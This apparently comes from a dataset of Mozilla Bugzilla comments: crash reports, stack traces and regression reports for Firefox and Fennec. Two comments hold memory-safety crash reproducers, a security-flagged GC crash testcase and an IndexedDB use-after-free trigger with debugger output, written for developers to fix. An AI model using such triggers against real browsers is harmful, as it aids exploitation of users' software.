Bug ID
int64 961
1.91M
| Comment ID
int64 3.98k
17.1M
| Author
stringlengths 8
48
| Comment Text
stringlengths 1
64.3k
⌀ |
---|---|---|---|
1,335,689 | 12,027,231 |
Created attachment 8832388
Client 01-02-2017, 11-19.crash
Build: 51abcc7c
Device: iPad Air 2
iOS: 10.2
Prerequisites:
- Blank page set as New Tab
Steps to reproduce:
1. Launch Fennec (A Blank tab is displayed)
2. Tap the Private Browsing button (A blank tab is displayed in a private browsing session)
3. Go to google.com in private browsing
4. Double tap on the Home button and close Fennec
5. Launch Fennec (Session is restored)
6. Tap on the mask button a few times to return to normal browsing
7. Tap two times on 'x' to close the opened tab
Actual results:
- Fennec will crash.
See a video of the issue:
- https://www.youtube.com/watch?v=7QNTlEtXlRw
Note:
- This issue is only reproducible when New Tab is set as Blank Page
|
|
1,308,920 | 11,772,507 |
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
Steps to reproduce:
(NOTE: I've tested in Beta 50 and in Nightly 52 - behaviour is the same)
I use postMessage to implement communication between extension (content script) and web page.
The communication should work if the web page is top window and if the web page is inside iframe.
To achieve this, the following alogoritm was implemented:
1. At the beginning content script listens for messages from window and uses window.top as targetWindow and '*' as targetOrigin to post messages back to page
Code:
var targetWindow = window.top;
var targetOrigin = '*';
var sourceWindow = window;
2. Every time when content script receives a message which is considired as valid message, it replaces value of targetWindow by msg.source and targetOrigin by msg.origin to be sure that it communicates with particular window, then forwards msg.data to extension
Code:
sourceWindow.addEventListener('message', function (msg) {
targetWindow = msg.source;
targetOrigin = msg.origin;
// handling of msg.data
}, false);
3. When reply from extension comes, content script sends the reply to page using targetWindow and targetOrigin.
Code:
targetWindow.postMessage(data, targetOrigin);
Actual results:
Error happens:
"Failed to execute ‘postMessage’ on ‘DOMWindow’: The target origin provided (‘https://my.domain.com’) does not match the recipient window’s origin (‘https://my.domain.com’)."
Although origins are identical (see string above) it says that they does not match!
By the way, the same code works fine in Chrome.
I found that I can work it around if targetOrigin is kept '*' (just targetWindow is replace in step 2).
For now I use this solution but it makes my code less secure.
Expected results:
No error happens and target window gets data which has been sent
|
|
1,309,205 | 11,775,227 |
[Tracking Requested - why for this release]: Unable to Print to file on Ubuntu16.04LTS 32bit.
The problem does present in Beta50.0b5 and Aurora51.0a2(10-Oct-2016).
However, the problem is reproducible in Nightly52.0a1(10-Oct-2016).
Steps To Reproduce:
1. Open about:home (or any simple page)
2. File > Print
3. Select "Print to file" and check pdf
4. Input file name and Click on [Print]
Actual Results:
The file does not created.
No error appears.
Expected Results;
The file does should be created.
Regression window:
https://hg.mozilla.org/integration/autoland/pushloghtml?fromchange=3e9a2031152fa07b088d0cb5e168eb53a2c882c0&tochange=c838d2546cadd65bf8d5579db20a268c8b6e4b87
Regressed by: Bug 1289718
|
|
1,310,162 | 11,785,710 |
This bug was filed from the Socorro interface and is
report bp-af5e0205-eb21-4f33-a2b5-bfd4b2161014.
=============================================================
Crashing Thread (0)
Frame Module Signature Source
0 xul.dll mozilla::dom::CompareSimpleTextTrackEvents::TrackChildPosition(mozilla::dom::SimpleTextTrackEvent*) dom/html/TextTrackManager.cpp:467
1 xul.dll mozilla::dom::CompareSimpleTextTrackEvents::LessThan(mozilla::dom::SimpleTextTrackEvent*, mozilla::dom::SimpleTextTrackEvent*) dom/html/TextTrackManager.cpp:494
2 xul.dll mozilla::BinarySearchIf<nsTArray_Impl<RefPtr<mozilla::dom::SimpleTextTrackEvent>, nsTArrayInfallibleAllocator>, detail::ItemComparatorFirstElementGT<mozilla::dom::SimpleTextTrackEvent*&, mozilla::dom::CompareSimpleTextTrackEvents> >(nsTArray_Impl<RefPtr<mozilla::dom::SimpleTextTrackEvent>, nsTArrayInfallibleAllocator> const&, unsigned int, unsigned int, detail::ItemComparatorFirstElementGT<mozilla::dom::SimpleTextTrackEvent*&, mozilla::dom::CompareSimpleTextTrackEvents> const&, unsigned int*) obj-firefox/dist/include/mozilla/BinarySearch.h:80
3 xul.dll nsTArray_Impl<RefPtr<mozilla::dom::SimpleTextTrackEvent>, nsTArrayInfallibleAllocator>::InsertElementSorted<mozilla::dom::SimpleTextTrackEvent*&, mozilla::dom::CompareSimpleTextTrackEvents, nsTArrayInfallibleAllocator>(mozilla::dom::SimpleTextTrackEvent*&, mozilla::dom::CompareSimpleTextTrackEvents const&) obj-firefox/dist/include/nsTArray.h:1444
4 xul.dll mozilla::dom::HTMLMediaElement::FireTimeUpdate(bool) dom/html/HTMLMediaElement.cpp:5178
this is a new crash signature that started to pop up in firefox 50 pre-release builds and subsequent versions and is happening in the codepath added with bug 882718.
so far it's happening on various versions of windows with a rather low volume (0.07% of browser crashes in 50.0b6).
|
|
1,310,453 | 11,788,693 |
[Tracking Requested - why for this release]:
[Tracking Requested - why for this release]:
[Tracking Requested - why for this release]:
[Tracking Requested - why for this release]:
This bug was filed from the Socorro interface and is
report bp-9b0f9f5f-9dc0-412e-9f1e-f53eb2161015.
=============================================================
Shutdown Crash,
The crash is reproducible since 47 bp-50f6fac8-0282-4e64-b2af-dc4b52161015.
Reproducible: always, Also crashed in the new profile
Steps To Reproduce:
1. Open Library (Ctrl+Shift+B)
2. Select "All Bookmarks" in the left side pane
3. Select multiple folders in the right side pane
E.g, (Bookmarks Toolbar, Bookmarks Menu and Unsorted Bookmarks)
(note: The crash will not be limited to these special folder)
4. Copy (Ctrl+C or right click and chose Copy)
5. Close Library and Quit Browser
Actual Results:
Crash reporter pops up
Expected Results:
No crash
Regression window:
https://hg.mozilla.org/integration/mozilla-inbound/pushloghtml?fromchange=c8be68703225291c63a409516f7a36cdeb6aa314&tochange=122337f76ded825b04a05aa7cc46b2bcd77ea695
Regressed by:
122337f76ded Makoto Kato — Bug 122337f76ded Makoto Kato — Bug 1240282 - Don't use NS_LossyConvertUTF16toASCII for URI. r=jimm - Don't use NS_LossyConvertUTF16toASCII for URI. r=jimm
|
|
1,311,380 | 11,797,647 |
+++ This bug was initially created as a clone of Bug #1294095 +++
We still have a small number of crashes in SctpDtlsOutput() on retransmissions:
https://crash-stats.mozilla.com/report/index/4ba148e2-49a5-4c2c-a7e9-476a82161019
This appears to be a "regular" retransmission, not an association abort. I think this is the same base cause as bug 1294095, which closed the big hole caused by the ordering of aborts and timer shutdown. The remaining failures may be cases where a normal retransmit hits the window.
We still could use the wrapper-object patch I wrote for bug 1294095. It does require locking on all the calls, and makes me a little concerned about deadlocks, but it should be safe.
See some of the previous discussion in bug 1294095 comment 38 and related comments before and after.
Note that we're still waiting on an sctp update from upstream; however it's unclear if that would actually help this.
|
|
1,312,480 | 11,808,990 |
The following testcase crashes on mozilla-central revision 215f96861176 (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-debug --enable-optimize, run with --fuzzing-safe --thread-count=2 --ion-offthread-compile=off):
var lfLogBuffer = `
z = new Int32Array;
function f() {
z.iterator = 2;
}
for (var i=1; i<3; new f | this)
f();
`;
var lfRunTypeId = -1;
loadFile(lfLogBuffer);
function loadFile(lfVarx) {
try {
switch (lfRunTypeId) {
case 1: eval(lfVarx);
default:
evaluate(lfVarx);
}
} catch (lfVare) {}
}
Backtrace:
received signal SIGSEGV, Segmentation fault.
#0 DoMarking<JSObject> (gcmarker=0x7ffff6961a80, thing=0x7ffff3681140) at js/src/gc/Marking.cpp:800
#1 0x000000000096ffb3 in js::InterpreterFrame::trace (this=this@entry=0x7ffff33c20a8, trc=trc@entry=0x7ffff6961a80, sp=0x7ffff33c2128, pc=0x7ffff6918ba6 ":") at js/src/vm/Stack.cpp:358
#2 0x0000000000970114 in MarkInterpreterActivation (act=0x7fffffffd280, trc=0x7ffff6961a80) at js/src/vm/Stack.cpp:417
#3 js::MarkInterpreterActivations (rt=<optimized out>, trc=trc@entry=0x7ffff6961a80) at js/src/vm/Stack.cpp:427
#4 0x0000000000ae8e6a in js::gc::GCRuntime::traceRuntimeCommon (this=this@entry=0x7ffff695f8f8, trc=trc@entry=0x7ffff6961a80, traceOrMark=traceOrMark@entry=js::gc::GCRuntime::MarkRuntime, lock=...) at js/src/gc/RootMarking.cpp:331
#5 0x0000000000ae92c2 in js::gc::GCRuntime::traceRuntimeForMajorGC (this=this@entry=0x7ffff695f8f8, trc=trc@entry=0x7ffff6961a80, lock=...) at js/src/gc/RootMarking.cpp:268
#6 0x00000000007ea59f in js::gc::GCRuntime::beginMarkPhase (this=this@entry=0x7ffff695f8f8, reason=reason@entry=JS::gcreason::ALLOC_TRIGGER, lock=...) at js/src/jsgc.cpp:3906
#7 0x00000000007fa835 in js::gc::GCRuntime::incrementalCollectSlice (this=this@entry=0x7ffff695f8f8, budget=..., reason=reason@entry=JS::gcreason::ALLOC_TRIGGER, lock=...) at js/src/jsgc.cpp:5844
#8 0x00000000007fbb59 in js::gc::GCRuntime::gcCycle (this=this@entry=0x7ffff695f8f8, nonincrementalByAPI=nonincrementalByAPI@entry=false, budget=..., reason=reason@entry=JS::gcreason::ALLOC_TRIGGER) at js/src/jsgc.cpp:6188
#9 0x00000000007fc041 in js::gc::GCRuntime::collect (this=0x7ffff695f8f8, nonincrementalByAPI=<optimized out>, budget=..., reason=<optimized out>) at js/src/jsgc.cpp:6326
#10 0x00000000007fcb2b in js::gc::GCRuntime::startGC (this=0x7ffff695f8f8, gckind=GC_NORMAL, reason=JS::gcreason::ALLOC_TRIGGER, millis=<optimized out>) at js/src/jsgc.cpp:6406
#11 0x00000000007fdbb2 in js::gc::GCRuntime::gcIfRequested (this=this@entry=0x7ffff695f8f8) at js/src/jsgc.cpp:6607
#12 0x0000000000907a3d in AutoGCIfRequested::~AutoGCIfRequested (this=<synthetic pointer>, __in_chrg=<optimized out>) at js/src/vm/Interpreter.cpp:414
#13 js::InternalCallOrConstruct (cx=0x7ffff695f000, args=..., construct=<optimized out>) at js/src/vm/Interpreter.cpp:434
#14 0x0000000000907d98 in js::Call (cx=cx@entry=0x7ffff695f000, fval=..., fval@entry=..., thisv=..., thisv@entry=..., args=..., rval=..., rval@entry=...) at js/src/vm/Interpreter.cpp:522
#15 0x00000000007dbc7c in js::Call (rval=..., thisObj=<optimized out>, fval=..., cx=0x7ffff695f000) at js/src/vm/Interpreter.h:96
#16 MaybeCallMethod (cx=cx@entry=0x7ffff695f000, obj=obj@entry=..., id=..., id@entry=..., vp=vp@entry=...) at js/src/jsobj.cpp:2926
#17 0x00000000007de87f in JS::OrdinaryToPrimitive (cx=cx@entry=0x7ffff695f000, obj=obj@entry=..., hint=hint@entry=JSTYPE_NUMBER, vp=vp@entry=...) at js/src/jsobj.cpp:3009
#18 0x00000000007dee82 in js::ToPrimitiveSlow (cx=cx@entry=0x7ffff695f000, preferredType=preferredType@entry=JSTYPE_NUMBER, vp=vp@entry=...) at js/src/jsobj.cpp:3057
#19 0x00000000007ed3fe in js::ToPrimitive (vp=..., preferredType=JSTYPE_NUMBER, cx=<optimized out>) at js/src/jsobj.h:1064
#20 js::ToNumberSlow (cx=0x7ffff695f000, v_=..., out=out@entry=0x7fffffffbe00) at js/src/jsnum.cpp:1616
#21 0x00000000007ed555 in js::ToNumberSlow (cx=<optimized out>, v=..., out=out@entry=0x7fffffffbe00) at js/src/jsnum.cpp:1629
#22 0x00000000007ee798 in js::ToInt32Slow (cx=<optimized out>, v=..., out=out@entry=0x7fffffffbe20) at js/src/jsnum.cpp:1735
#23 0x000000000057b2e8 in JS::ToInt32 (out=0x7fffffffbe20, v=..., cx=0x7ffff695f000) at /srv/jenkins/jobs/mozilla-central-build-jsshell/workspace/arch/64/compiler/gcc/sanitizer/none/type/opt/dist/include/js/Conversions.h:167
#24 js::BitOr (cx=0x7ffff695f000, lhs=..., rhs=..., out=0x7fffffffbe6c) at js/src/vm/Interpreter-inl.h:723
#25 0x00007ffff7e3fe9f in ?? ()
[...]
#37 0x0000000000000000 in ?? ()
rax 0xfff8800000000002 -2111062325329918
rbx 0x7ffff3681140 140737277071680
rcx 0x10228 66088
rdx 0x7ffff696b028 140737330458664
rsi 0x7ffff36fc0a0 140737277575328
rdi 0x0 0
rbp 0x7ffff6961a80 140737330420352
rsp 0x7fffffffb530 140737488336176
r8 0x7ffff36fe0e0 140737277583584
r9 0x10000000000 1099511627776
r10 0x4 4
r11 0x246 582
r12 0x7ffff6961a80 140737330420352
r13 0x7ffff33c2128 140737274192168
r14 0x7fffffffb8c0 140737488337088
r15 0x7ffff6918ba6 140737330121638
rip 0xad55ea <DoMarking<JSObject>(js::GCMarker*, JSObject*)+90>
=> 0xad55ea <DoMarking<JSObject>(js::GCMarker*, JSObject*)+90>: mov 0x10(%rax),%rax
0xad55ee <DoMarking<JSObject>(js::GCMarker*, JSObject*)+94>: movb $0x1,0x351(%rax)
Looks like a GC crash with a non-zero address, marking s-s until triaged.
|
|
1,312,595 | 11,810,158 |
+++ This bug was initially created as a clone of Bug #1299520 +++
See the discussion in bug 1299520 for more context.
|
|
1,313,980 | 11,824,718 |
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Build ID: 20161029030204
Steps to reproduce:
I'm using native messaging to launch a local host app from my web site. After online install my host app, my extension can't communicate with host app.
This issue found in Firefox Nightly 52.0a1(2016-10-30), but can't reproduce in 52.0a1(2016-10-29).
Actual results:
Shortly after chrome.runtime.connectNative in background.js, an onDisconnect event occured and I checked the host app, it is launched and not exited.
Expected results:
Should not receive onDisconnect event in background.js
|
|
1,314,172 | 11,826,746 |
The following testcase crashes on mozilla-central revision 37ab1d54a08e (build with --enable-debug --enable-more-deterministic, run with --fuzzing-safe --no-threads --ion-eager):
oomTest(function() {
Array(1[new Uint8Array()])
})
Backtrace:
0 js-dbg-64-dm-clang-darwin-37ab1d54a08e 0x000000010df664a6 js::jit::AssertBasicGraphCoherency(js::jit::MIRGraph&) + 5510 (IonAnalysis.cpp:2755)
1 js-dbg-64-dm-clang-darwin-37ab1d54a08e 0x000000010df61de6 js::jit::OptimizeMIR(js::jit::MIRGenerator*) + 230 (Ion.cpp:1513)
2 js-dbg-64-dm-clang-darwin-37ab1d54a08e 0x000000010df6ee3a js::jit::CompileBackEnd(js::jit::MIRGenerator*) + 74 (Ion.cpp:2021)
3 js-dbg-64-dm-clang-darwin-37ab1d54a08e 0x000000010df70c9a js::jit::Compile(JSContext*, JS::Handle<JSScript*>, js::jit::BaselineFrame*, unsigned char*, bool) + 3834 (Ion.cpp:2302)
/snip
For detailed crash information, see attachment.
|
|
1,315,089 | 11,835,207 |
This bug was filed from the Socorro interface and is
report bp-f304c896-109c-409b-af18-342372161103.
=============================================================
I see a lot of Youtube URLs in these crashes, so I'm going to assume it is a hardware decoding issue like bug 1271525 or bug 1283892. This is Nightly-only.
I'm guessing these two signatures are the same issue, but maybe not. There are about 45 of each in the last week.
Here's a report from the kernelbase version: bp-5fdca4fb-dca9-4b85-8440-f57c32161103
|
|
1,315,627 | 11,840,764 |
Created attachment 8808094
Client 07-11-16 11-10.crash
Build: 1bc8bb71f
Device:
iPad Pro (9.3.2)
iPad Air 2 (10.0.3)
Steps to reproduce"
1. Launch Fennec
2. Quickly tap on 'Private Browsing' button
3. While switching between browsing session tap the 'New tab' button
4. Repeat steps 2 and 3
Actual results:
- Fennec will crash. I noticed that when opening a new tab(Tapping on the + button) the privacy toggle button is disabled, but when tapping quickly on this button (switching between browsing sessions) the 'Open new tab' button is still enabled which will cause the crash to occur.
Expected:
- A solution might be to disable the 'New tab' button when the 'privacy toggle button' is animated and re-enable the button after the animation occurs.
See video of the issue: https://www.youtube.com/watch?v=clubVyTfQMQ
|
|
1,319,271 | 11,877,706 |
Reproduction test case (just the worker code, full server code in UAF_Fail_Repro.js ):
workercode1 += 'var db;\n';
workercode1 += 'var dbreq0 ; dbreq0= indexedDB.open("TestDb'+dbSuffix+'", 1);\n';
workercode1 += ' dbreq0.onupgradeneeded = function(event) { db = event.target.result;console.log("------upgrade needed.");db.onversionchange=function(event) {try{ dbreq0 = indexedDB.open("TestDb'+dbSuffix+'", 3);}catch(e){}\n';
workercode1 += '};\n';
workercode1 += '};\n';
Steps to reproduce:
1. Run server side script UAF_Fail_Repro.js in Node.js (node UAF_Fail_Repro.js).
2. Enter http://localhost:12345 in Firefox browser.
Firefox version: 53.0a1 (2016-11-21) (32-bit)
OS: Windows 10
Stack trace:
(5bac.4fb4): Access violation - code c0000005 (!!! second chance !!!)
eax=e5e5e5e5 ebx=23239dc0 ecx=0e1c2290 edx=1163f41c esi=14a3f82f edi=23239dc0
eip=1007aeb2 esp=14a3f7c8 ebp=14a3f7fc iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
xul!mozilla::ipc::IPCResult::Fail+0x1e:
1007aeb2 ff5028 call dword ptr [eax+28h] ds:002b:e5e5e60d=????????
0:055> .exr -1
ExceptionAddress: 1007aeb2 (xul!mozilla::ipc::IPCResult::Fail+0x0000001e)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: e5e5e60d
Attempt to read from address e5e5e60d
0:055> kb
# ChildEBP RetAddr Args to Child
00 14a3f7fc 109a195f 0e1c2290 146aa000 0e1c2290 xul!mozilla::ipc::IPCResult::Fail+0x1e [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\ipc\glue\protocolutils.cpp @ 61]
01 14a3f814 0fe74ffa 14a3f82f 2311ac78 2311ac00 xul!mozilla::dom::indexedDB::`anonymous namespace'::VersionChangeTransaction::RecvDeleteMe+0x3b [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\indexeddb\actorsparent.cpp @ 15931]
02 14a3f8e4 0fac45c2 23239dc0 2311ac78 00000001 xul!mozilla::dom::indexedDB::PBackgroundIDBVersionChangeTransactionParent::OnMessageReceived+0x3b074e [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\obj-firefox\ipc\ipdl\pbackgroundidbversionchangetransactionparent.cpp @ 180]
03 14a3fa80 0f82fed1 23239dc0 2311ac78 2beffd70 xul!mozilla::ipc::PBackgroundParent::OnMessageReceived+0x48 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\obj-firefox\ipc\ipdl\pbackgroundparent.cpp @ 1897]
04 14a3fa9c 0f82fd3f 00239dc0 23239dc0 2311ac78 xul!mozilla::ipc::MessageChannel::DispatchAsyncMessage+0x50 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\ipc\glue\messagechannel.cpp @ 1744]
05 14a3fb04 0f82f409 23239dc0 23239da0 2beffd70 xul!mozilla::ipc::MessageChannel::DispatchMessageW+0xb7 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\ipc\glue\messagechannel.cpp @ 1684]
06 14a3fb1c 0f82f3a4 23239da0 00000000 23239da0 xul!mozilla::ipc::MessageChannel::RunMessage+0x53 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\ipc\glue\messagechannel.cpp @ 1573]
07 14a3fb34 0f82b66f 23239da0 14611600 00000001 xul!mozilla::ipc::MessageChannel::MessageTask::Run+0x38 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\ipc\glue\messagechannel.cpp @ 1598]
08 14a3fbcc 0f82a0b0 145d4b60 00000001 14a3fbe7 xul!nsThread::ProcessNextEvent+0x2aa [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\xpcom\threads\nsthread.cpp @ 1219]
09 14a3fbe8 0f8dc250 14611600 14611600 581b9a8d xul!NS_ProcessNextEvent+0x16 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\xpcom\glue\nsthreadutils.cpp @ 361]
0a 14a3fc08 0f8dc148 00611600 0eff6cb5 14611600 xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0xc0 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\ipc\glue\messagepump.cpp @ 369]
0b (Inline) -------- -------- -------- -------- xul!MessageLoop::RunInternal+0x8 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\ipc\chromium\src\base\message_loop.cc @ 232]
0c 14a3fc40 0f8dc117 145d4b60 00000001 581b9a00 xul!MessageLoop::RunHandler+0x20 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\ipc\chromium\src\base\message_loop.cc @ 226]
0d 14a3fc60 0f8db01d 770b29d0 14439a30 14439ae0 xul!MessageLoop::Run+0x19 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\ipc\chromium\src\base\message_loop.cc @ 206]
0e 14a3fc94 581b9ff2 145d4b60 06d421c8 581afab5 xul!nsThread::ThreadFunc+0xb8 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\xpcom\threads\nsthread.cpp @ 469]
0f 14a3fcb4 581afac2 14439a30 14a3fcfc 6c8962a4 nss3!_PR_NativeRunThread+0xcc [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\nsprpub\pr\src\threads\combined\pruthr.c @ 397]
10 14a3fcc0 6c8962a4 14439a30 7648327f 6c896250 nss3!pr_root+0xd [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\nsprpub\pr\src\md\windows\w95thred.c @ 95]
11 14a3fcfc 770b38f4 06d421c8 770b38d0 6dd351a8 ucrtbase!_crt_at_quick_exit+0x104
12 14a3fd10 77bf5de3 06d421c8 6d0faeba 00000000 KERNEL32!BaseThreadInitThunk+0x24
WARNING: Stack unwind information not available. Following frames may be wrong.
13 14a3fd58 77bf5dae ffffffff 77c1b7bd 00000000 ntdll!RtlUnicodeStringToInteger+0x253
14 14a3fd68 00000000 6c896250 06d421c8 00000000 ntdll!RtlUnicodeStringToInteger+0x21e
Variables shows that the actor object had been freed:
actor class mozilla::NotNull<mozilla::ipc::IProtocol *>
mBasePtr 0x0e1c2290 class mozilla::ipc::IProtocol *
mozilla::ipc::HasResultCodes struct mozilla::ipc::HasResultCodes
__vfptr 0xe5e5e5e5
mId 0n-437918235
mSide 0n-437918235 (No matching enumerant)
mManager 0xe5e5e5e5 class mozilla::ipc::IProtocol *
mChannel 0xe5e5e5e5 class mozilla::ipc::MessageChannel *
where 0x1163f41c "RecvDeleteMe"
errorMsg class nsPrintfCString
|
|
1,319,456 | 11,879,653 |
This bug was filed from the Socorro interface and is
report bp-8a500d05-e87e-4aad-a2d2-0c0592161122.
=============================================================
Crashing Thread (0)
Frame Module Signature Source
0 xul.dll std::_Hash<std::_Uset_traits<mozilla::gfx::DrawTargetD2D1*, std::_Uhash_compare<mozilla::gfx::DrawTargetD2D1*, std::hash<mozilla::gfx::DrawTargetD2D1*>, std::equal_to<mozilla::gfx::DrawTargetD2D1*> >, std::allocator<mozilla::gfx::DrawTargetD2D1*>, 0> >::equal_range(mozilla::gfx::DrawTargetD2D1* const&) vs2015u2/VC/include/xhash:641
1 xul.dll mozilla::gfx::DrawEventRecorderPrivate::RemoveStoredObject(mozilla::gfx::ReferencePtr) gfx/2d/DrawEventRecorder.h:42
2 xul.dll nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>::ShiftData<nsTArrayInfallibleAllocator>(unsigned int, unsigned int, unsigned int, unsigned int, unsigned int) obj-firefox/dist/include/nsTArray-inl.h:261
3 xul.dll mozilla::gfx::PathRecording::`scalar deleting destructor'(unsigned int)
4 xul.dll nsTArray_Impl<mozilla::dom::CanvasRenderingContext2D::ContextState, nsTArrayInfallibleAllocator>::RemoveElementsAt(unsigned int, unsigned int) obj-firefox/dist/include/nsTArray.h:1905
5 xul.dll mozilla::dom::CanvasRenderingContext2D::`scalar deleting destructor'(unsigned int)
6 xul.dll SnowWhiteKiller::~SnowWhiteKiller() xpcom/base/nsCycleCollector.cpp:2685
7 xul.dll nsCycleCollector::FreeSnowWhite(bool) xpcom/base/nsCycleCollector.cpp:2859
8 xul.dll nsCycleCollector_doDeferredDeletion() xpcom/base/nsCycleCollector.cpp:4134
9 xul.dll AsyncFreeSnowWhite::Run() js/xpconnect/src/XPCJSRuntime.cpp:142
10 xul.dll nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:1076
11 xul.dll NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:290
12 xul.dll nsPrintingProxy::ShowPrintDialog(mozIDOMWindowProxy*, nsIWebBrowserPrint*, nsIPrintSettings*) embedding/components/printingui/ipc/nsPrintingProxy.cpp:113
13 xul.dll nsPrintEngine::DoCommonPrint(bool, nsIPrintSettings*, nsIWebProgressListener*, nsIDOMDocument*) layout/printing/nsPrintEngine.cpp:616
14 xul.dll nsPrintEngine::CommonPrint(bool, nsIPrintSettings*, nsIWebProgressListener*, nsIDOMDocument*) layout/printing/nsPrintEngine.cpp:405
15 xul.dll nsPrintEngine::Print(nsIPrintSettings*, nsIWebProgressListener*) layout/printing/nsPrintEngine.cpp:788
16 xul.dll nsDocumentViewer::Print(nsIPrintSettings*, nsIWebProgressListener*) layout/base/nsDocumentViewer.cpp:3727
17 xul.dll nsGlobalWindow::PrintOuter(mozilla::ErrorResult&) dom/base/nsGlobalWindow.cpp:7388
18 xul.dll nsGlobalWindow::Print(mozilla::ErrorResult&) dom/base/nsGlobalWindow.cpp:7414
19 xul.dll mozilla::dom::WindowBinding::print obj-firefox/dom/bindings/WindowBinding.cpp:2527
20 xul.dll mozilla::dom::WindowBinding::genericMethod obj-firefox/dom/bindings/WindowBinding.cpp:13778
21 xul.dll js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) js/src/vm/Interpreter.cpp:453
22 @0xfffffff5
23 @0xfffffff5
24 @0xfffffff5
25 kernel32.dll InterlockedExchangeAdd
26 xul.dll mozilla::detail::ThreadLocal<mozilla::dom::ScriptSettingsStackEntry*>::set(mozilla::dom::ScriptSettingsStackEntry* const) obj-firefox/dist/include/mozilla/ThreadLocal.h:203
27 xul.dll nsWrapperCache::GetWrapper() dom/base/nsWrapperCacheInlines.h:19
28 xul.dll mozilla::dom::ToJSValue<mozilla::dom::EventTarget>(JSContext*, mozilla::dom::EventTarget&, JS::MutableHandle<JS::Value>) obj-firefox/dist/include/mozilla/dom/ToJSValue.h:154
29 xul.dll mozilla::dom::Event::GetEventPopupControlState(mozilla::WidgetEvent*, nsIDOMEvent*) dom/events/Event.cpp:712
30 @0x2
31 xul.dll mozilla::ipc::MessageChannel::OnMaybeDequeueOne() ipc/glue/MessageChannel.cpp:1566
32 winmm.dll timeGetTime
33 xul.dll mozilla::detail::RunnableMethodImpl<bool ( mozilla::ipc::MessageChannel::*)(void), 0, 1>::Run() obj-firefox/dist/include/nsThreadUtils.h:764
34 xul.dll mozilla::ipc::MessageChannel::DequeueTask::Run() obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:569
35 xul.dll nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:1076
crashes in the content process with this signature are spiking since firefox 50 builds on windows. currently they account for around 1.2% of all content process crashes in firefox 50.0.
Correlations for Firefox Release:
(100.0% in signature vs 36.07% overall) dom_ipc_enabled = 1
(100.0% in signature vs 37.04% overall) reason = EXCEPTION_ACCESS_VIOLATION_READ
(94.97% in signature vs 42.29% overall) "D2D1.1-" in app_notes = true
|
|
1,319,566 | 11,880,789 |
This bug was filed from the Socorro interface and is
report bp-51f223b0-48eb-4bae-b05f-561bc2161122.
=============================================================
Crashing Thread (35)
Frame Module Signature Source
0 xul.dll nsTArray_Impl<RefPtr<mozilla::MediaEngineSource::AllocationHandle>, nsTArrayInfallibleAllocator>::DestructRange(unsigned int, unsigned int) obj-firefox/dist/include/nsTArray.h:1861
1 xul.dll nsTArray_Impl<RefPtr<mozilla::MediaEngineSource::AllocationHandle>, nsTArrayInfallibleAllocator>::RemoveElementsAt(unsigned int, unsigned int) obj-firefox/dist/include/nsTArray.h:1905
2 xul.dll mozilla::MediaEngineSource::Deallocate(mozilla::MediaEngineSource::AllocationHandle*) dom/media/webrtc/MediaEngine.h:248
3 xul.dll mozilla::MediaEngineWebRTCMicrophoneSource::Deallocate(mozilla::MediaEngineSource::AllocationHandle*) dom/media/webrtc/MediaEngineWebRTCAudio.cpp:400
4 xul.dll mozilla::MediaEngineWebRTCMicrophoneSource::Shutdown() dom/media/webrtc/MediaEngineWebRTCAudio.cpp:823
5 xul.dll mozilla::MediaEngineWebRTC::Shutdown() dom/media/webrtc/MediaEngineWebRTC.cpp:438
6 xul.dll `mozilla::MediaManager::Shutdown'::`2'::ShutdownTask::Run dom/media/MediaManager.cpp:2914
7 xul.dll MessageLoop::RunTask(already_AddRefed<mozilla::Runnable>) ipc/chromium/src/base/message_loop.cc:346
8 xul.dll MessageLoop::DeferOrRunPendingTask(MessageLoop::PendingTask&&) ipc/chromium/src/base/message_loop.cc:354
9 xul.dll MessageLoop::DoWork() ipc/chromium/src/base/message_loop.cc:429
10 xul.dll mozilla::ipc::MessagePumpForNonMainUIThreads::DoRunLoop() ipc/glue/MessagePump.cpp:423
11 xul.dll base::MessagePumpWin::RunWithDispatcher(base::MessagePump::Delegate*, base::MessagePumpWin::Dispatcher*) ipc/chromium/src/base/message_pump_win.cc:56
crashes with this signature are regressing in 32bit firefox 50 builds and later on windows - could this be related to bug 1286096?
some of the user comments are saing they had their camera/microphone in use or were trying to give access:
* Attempted to share devices on facebook (camera and microphone), kept not remembering the device settings, reprompting permissions constantly. It then crashed.
https://crash-stats.mozilla.com/report/index/458384ab-31ba-4bea-b737-4bf242160926
